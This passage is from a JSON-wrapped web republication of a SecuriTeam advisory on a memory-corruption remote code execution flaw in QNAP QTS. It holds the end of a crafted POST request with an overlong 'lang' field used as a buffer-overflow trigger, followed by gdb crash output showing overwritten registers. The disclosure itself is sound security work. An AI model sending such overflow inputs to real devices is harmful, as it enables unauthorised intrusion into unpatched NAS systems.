class=\"crayon-e\">Windows <\/span><span class=\"crayon-i\">NT<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">10.0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">WOW64<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">rv<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">53.0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Gecko<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">20100101<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Firefox<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">53.0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f0469c3a79781672416-4\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">html<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xhtml<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.9<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.8<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f0469c3a79781672416-5\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Language<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">it<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">IT<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">it<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.8<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">US<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.5<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.3<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f0469c3a79781672416-6\"><span class=\"crayon-v\">Connection<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">close<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f0469c3a79781672416-7\"><span class=\"crayon-v\">Upgrade<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Insecure<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Requests<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f0469c3a79781672416-8\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Type<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">www<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">urlencoded<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f0469c3a79781672416-9\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Length<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">343<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f0469c3a79781672416-10\"><span class=\"crayon-v\">qpkg<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">pwnt<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">lang<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-e\">AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f0469c3a79781672416-11\"><span class=\"crayon-e\">AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f0469c3a79781672416-12\"><span class=\"crayon-e\">AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f0469c3a79781672416-13\"><span class=\"crayon-e\">AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAXXXXBBBBBBBBBBBBBBBBBB<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f0469c3a79781672416-14\"><span class=\"crayon-v\">BBBBBBBBBBBBBBBBBBBBBBYYYY<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0021 seconds] -->  <\/p>\n<p>Producing the following crash:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a2f0469c3a7c414626173\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> Program received signal SIGSEGV, Segmentation fault.  r0 0x8 8  r1 0x0 0  r2 0x1740 5952  r3 0x58585858 1482184792  r4 0x58585858 1482184792  r5 0xffffffff 4294967295  r6 0x0 0  r7 0x0 0  r8 0x4 4  r9 0x977008 9924616  r10 0x1 1  r11 0xbee346e4 3202565860  r12 0xbee33db8 3202563512  sp 0xbee34370 0xbee34370  lr 0xb6c53b84 3066379140  pc 0x1c87c 0x1c87c  cpsr 0x20000010 536870928  =&gt; 0x1c87c: ldr r3, [r4, r2]   0x1c880: cmp r3, #1   0x1c884: beq 0x1caa4  0x0001c87c in ?? ()  (gdb) x\/i $pc  =&gt; 0x1c87c: ldr r3, [r4, r2]<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a2f0469c3a7c414626173-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f0469c3a7c414626173-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f0469c3a7c414626173-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f0469c3a7c414626173-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f0469c3a7c414626173-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f0469c3a7c414626173-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f0469c3a7c414626173-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f0469c3a7c414626173-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f0469c3a7c414626173-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f0469c3a7c414626173-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f0469c3a7c414626173-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f0469c3a7c414626173-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f0469c3a7c414626173-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f0469c3a7c414626173-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f0469c3a7c414626173-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f0469c3a7c414626173-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f0469c3a7c414626173-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f0469c3a7c414626173-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f0469c3a7c414626173-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f0469c3a7c414626173-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f0469c3a7c414626173-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f0469c3a7c414626173-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f0469c3a7c414626173-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f0469c3a7c414626173-24\">24<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a2f0469c3a7c414626173-1\"><span class=\"crayon-e\">Program <\/span><span class=\"crayon-e\">received <\/span><span class=\"crayon-e\">signal <\/span><span class=\"crayon-v\">SIGSEGV<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Segmentation <\/span><span class=\"crayon-v\">fault<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f0469c3a7c414626173-2\"><span class=\"crayon-i\">r0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x8<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f0469c3a7c414626173-3\"><span class=\"crayon-i\">r1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f0469c3a7c414626173-4\"><span class=\"crayon-i\">r2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x1740<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">5952<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f0469c3a7c414626173-5\"><span class=\"crayon-i\">r3<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x58585858<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1482184792<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f0469c3a7c414626173-6\"><span class=\"crayon-i\">r4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x58585858<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1482184792<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f0469c3a7c414626173-7\"><span class=\"crayon-i\">r5<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xffffffff<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4294967295<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f0469c3a7c414626173-8\"><span class=\"crayon-i\">r6<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f0469c3a7c414626173-9\"><span class=\"crayon-i\">r7<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f0469c3a7c414626173-10\"><span class=\"crayon-i\">r8<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f0469c3a7c414626173-11\"><span class=\"crayon-i\">r9<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x977008<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">9924616<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f0469c3a7c414626173-12\"><span class=\"crayon-i\">r10<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f0469c3a7c414626173-13\"><span class=\"crayon-i\">r11<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xbee346e4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3202565860<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f0469c3a7c414626173-14\"><span class=\"crayon-i\">r12<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xbee33db8<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3202563512<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f0469c3a7c414626173-15\"><span class=\"crayon-i\">sp<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xbee34370<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xbee34370<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f0469c3a7c414626173-16\"><span class=\"crayon-i\">lr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xb6c53b84<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3066379140<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f0469c3a7c414626173-17\"><span class=\"crayon-i\">pc<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x1c87c<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x1c87c<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f0469c3a7c414626173-18\"><span class=\"crayon-i\">cpsr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x20000010<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">536870928<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f0469c3a7c414626173-19\"><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x1c87c<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ldr <\/span><span class=\"crayon-v\">r3<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">r4<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r2<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f0469c3a7c414626173-20\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x1c880<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">cmp <\/span><span class=\"crayon-v\">r3<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-p\">#1<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f0469c3a7c414626173-21\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x1c884<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">beq<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x1caa4<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f0469c3a7c414626173-22\"><span class=\"crayon-cn\">0x0001c87c<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f0469c3a7c414626173-23\"><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">gdb<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-i\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">pc<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f0469c3a7c414626173-24\"><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x1c87c<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ldr <\/span><span class=\"crayon-v\">r3<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">r4<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r2<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0023 seconds] -->  <\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\" title=\"Printer Friendly, PDF &#038; Email\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\" alt=\"Print Friendly, PDF &#038; Email\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3565\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/12\/image005-207x300.png\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Mon, 11 Dec 2017 10:16:42 +0000<\/strong><\/p>\n<p>Vulnerability Summary The following advisory describes a memory corruption vulnerability that can lead to an unauthenticated remote code execution in QNAP QTS versions 4.3.x and 4.2.x, including the 4.3.3.0299. QNAP Systems, Inc. is &#8220;a Taiwanese corporation that specializes in providing networked solutions for file sharing, virtualization, storage management and surveillance applications to address corporate, SMB, &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3565\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 QNAP QTS Unauthenticated Remote Code Execution<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[12033,11682,10757,12136],"class_list":["post-10807","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-buffer-overflow","tag-remote-code-execution","tag-securiteam-secure-disclosure","tag-unauthenticated-action"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/10807","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=10807"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/10807\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=10807"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=10807"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=10807"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}